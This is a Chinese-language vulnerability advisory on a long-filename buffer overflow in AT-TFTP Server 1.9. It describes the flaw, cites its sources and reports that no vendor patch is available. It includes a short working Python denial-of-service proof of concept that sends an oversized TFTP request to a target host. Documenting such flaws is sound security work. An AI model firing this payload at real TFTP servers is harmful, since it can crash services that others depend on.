AT-TFTP Server超长文件名远程缓冲区溢出漏洞
发布日期:2006-11-27
更新日期:2006-11-29
受影响系统:Allied Telesyn AT-TFTP Server 1.9
描述:
BUGTRAQ ID:
21320
AT-TFTP Server是一款免费的基于Windows的TFTP服务器,用于在PC和Allied Telesis路由器及一些交换机之间传输软件发布、补丁、脚本等。
AT-TFTP Server在处理带有超长文件名参数的请求时存在漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。
AT-TFTP Server在处理传送给GET或PUT命令的超长文件名(大于227个字节)时存在缓冲区溢出。如果攻击者向服务器发送了恶意报文的话就会触发这个漏洞,导致拒绝服务或执行任意代码。
<*来源:Liu Qixu (
liuqx@nipc.org.cn)
链接:
http://secunia.com/advisories/23106/
http://marc.theaimsgroup.com/?l=bugtraq&m=116465171317368&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
# Buffer Overflow (Long filename) Vulnerability Exploit
# This is just a DoS exploiting code
# Tested on Windows xp SP2
#
# Requires python and impacket
#
# Coded by Liu Qixu Of NCNIPC
import socket
import sys
host = '192.168.1.11'
port = 69
try:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
filename = "A" * 227
mode = "netascii"
data = "\x00\x02" + filename + "\0" + mode + "\0"
s.sendto(data, (host, port))
建议:
厂商补丁:
Allied Telesyn
--------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.alliedtelesyn.co.uk/en-gb/support/downloads/tools.asp浏览次数:3884
严重程度:0(网友投票)